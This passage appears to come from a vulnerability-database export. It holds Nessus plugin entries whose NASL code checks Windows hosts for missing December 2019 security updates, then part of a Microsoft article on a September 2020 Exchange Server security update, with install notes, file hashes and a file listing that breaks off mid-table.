(CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530734/windows-7-update-kb4530734\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89866a56\");\n # https://support.microsoft.com/en-us/help/4530692/windows-7-update-kb4530692\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?abe20468\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530692 or Cumulative Update KB4530734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530734', '4530692');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530734, 4530692])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:54", "description": "The remote Windows host is missing security update 4530681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530681: Windows 10 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530681.NASL", "href": "https://www.tenable.com/plugins/nessus/131925", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131925);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530681\");\n script_xref(name:\"MSFT\", value:\"MS19-4530681\");\n\n script_name(english:\"KB4530681: Windows 10 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530681/windows-10-update-kb4530681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3629add0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530681');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530681])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:51:06", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-16875"], "description": "<html><body><p>Description of the security update for Microsoft Exchange Server 2019 and 2016: September 8, 2020</p><h2></h2><p>This update rollup is a security update that\u00a0resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following security advisory:</p><ul><li><a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875\" managed-link=\"\" target=\"_blank\">CVE-2020-16875 |\u00a0Microsoft Exchange Memory Corruption Vulnerability</a></li></ul><h2>Known issues in this update</h2><ul><li><p>When you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode\u00a0(that is, not as an administrator), some files are not correctly updated.</p><p>When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working.<br/><br/>This issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.</p><p>To avoid this issue, follow these steps to manually install this security update:</p><ol><li>Select <strong>Start</strong>, and type\u00a0<strong>cmd</strong>.</li><li>In the results, right-click <strong>Command Prompt</strong>, and then select <strong>Run as administrator</strong>.</li><li>If the <strong>User Account Control</strong> dialog box appears, verify that the default action is the action that you want, and then select <strong>Continue</strong>.</li><li>Type the full path of the .msp file, and then press Enter.</li></ol><p>This issue does not occur if you install the update through Microsoft Update.</p></li><li><p>Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to their\u00a0usual state.<br/><br/>To fix this issue, use Services Manager to restore the startup type to <strong>Automatic</strong>, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx\" managed-link=\"\" target=\"_blank\">Start a Command Prompt as an Administrator</a>.</p></li></ul><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically.\u00a0<span><span>For more information about how to turn on automatic updating, see </span></span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4577352\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=4b14aea8-7179-4689-ae09-94da952869ac\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 6 (KB4577352)</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=8842cfd3-2585-404b-89e4-1718f67e232c\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 5 (KB4577352)</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=589d2f7f-31bf-48c5-aaf2-fc69999097d4\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2016 Cumulative Update 17 (KB4577352)</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=8af5b070-a354-4ec2-941e-750b154b771f\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2016 Cumulative Update 16 (KB4577352)</a></li></ul><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see\u00a0<a aria-live=\"rude\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/20200908\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">security update deployment information: September 8, 2020</a>.\u00a0</p><h3>Security update replacement information</h3><p>This security update replaces the following previously released updates:</p><ul><li><a data-content-id=\"4536987\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Description of the security update for Microsoft Exchange Server 2019 and 2016: March 10, 2020</a></li></ul><h2>File information</h2><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Update name</th><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Exchange Server 2019 Cumulative Update 6</td><td>Exchange2019-KB4577352-x64-en.msp</td><td>5B3B0B62C5E569DD5933C7BA9B1CCC6DB4E345BA</td><td>505D471F51C9FCAB7DAB05B5BC1AFD90F29B3C5E220B0BD8C4B2294DC73FB2FA</td></tr><tr><td>Exchange Server 2019 Cumulative Update 5</td><td>Exchange2019-KB4577352-x64-en.msp</td><td>BB2831C140538F45CBAC9F819ECBD95A1B07DDAC</td><td>5D9DAAF411F0C5DEA72BBD238DACC3852D90EDCAAA4CBA1D909C93ED061EC122</td></tr><tr><td>Exchange Server 2016 Cumulative Update 17</td><td>Exchange2016-KB4577352-x64-en.msp</td><td>CE5F53FDE5F3DFE491B80CE27FEA735EBAA929BC</td><td>176F74049CC7B9087A7C6190DBD85EC0A1B269FC8EE4F646CF17710B5E97924C</td></tr><tr><td>Exchange Server 2016 Cumulative Update 16</td><td>Exchange2016-KB4577352-x64-en.msp</td><td>F6227A7AE5DFDDBE27E8F3C6BB3AD5D3907FCF52</td><td>851E0361A4300E44A3F01E20E125191CC1728FE30EA3298B9FA1E3D49AF89000</td></tr></tbody></table><h3><br/>Exchange server file information</h3><p>The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2019 Cumulative Update 6</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.2.659.6</td><td>71,040</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,522</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,929</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Ademodule.dll</td><td>15.2.659.6</td><td>106,376</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Airfilter.dll</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>15.2.659.6</td><td>92,544</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>13,505</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,087,232</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>77,824</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Bigfunnel.bondtypes.dll</td><td>15.2.659.6</td><td>45,448</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Bigfunnel.common.dll</td><td>15.2.659.6</td><td>66,424</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.configuration.dll</td><td>15.2.659.6</td><td>118,144</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.entropy.dll</td><td>15.2.659.6</td><td>44,424</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.filter.dll</td><td>15.2.659.6</td><td>54,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.indexstream.dll</td><td>15.2.659.6</td><td>68,984</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Bigfunnel.neuraltree.dll</td><td>Not applicable</td><td>694,144</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Bigfunnel.neuraltreeranking.dll</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.poi.dll</td><td>15.2.659.6</td><td>245,128</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.postinglist.dll</td><td>15.2.659.6</td><td>189,320</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Bigfunnel.query.dll</td><td>15.2.659.6</td><td>101,248</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.ranking.dll</td><td>15.2.659.6</td><td>109,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.syntheticdatalib.dll</td><td>15.2.659.6</td><td>3,634,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.tracing.dll</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.wordbreakers.dll</td><td>15.2.659.6</td><td>46,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cafe_airfilter_dll</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Cafe_exppw_dll</td><td>15.2.659.6</td><td>83,336</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Cafe_owaauth_dll</td><td>15.2.659.6</td><td>92,032</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>42,097</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>94,622</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>15.2.659.6</td><td>57,224</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>15,805</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>82,664</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>14,464</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Classificationengine_mce</td><td>15.2.659.6</td><td>1,693,576</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>15.2.659.6</td><td>134,016</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Coconet.dll</td><td>15.2.659.6</td><td>48,008</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>81,644</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>41,886</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>29,931</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Complianceauditservice.exe</td><td>15.2.659.6</td><td>39,808</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>22,764</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Configurecaferesponseheaders.ps1</td><td>Not applicable</td><td>20,308</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Configurecryptodefaults.ps1</td><td>Not applicable</td><td>42,039</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>19,770</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>39,828</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Configure_enterprisepartnerapplication.ps1</td><td>Not applicable</td><td>22,283</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>37,125</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>29,620</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,232</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>20,053</td><td>12-Aug-2020</td><td>21:27</td><td>Not 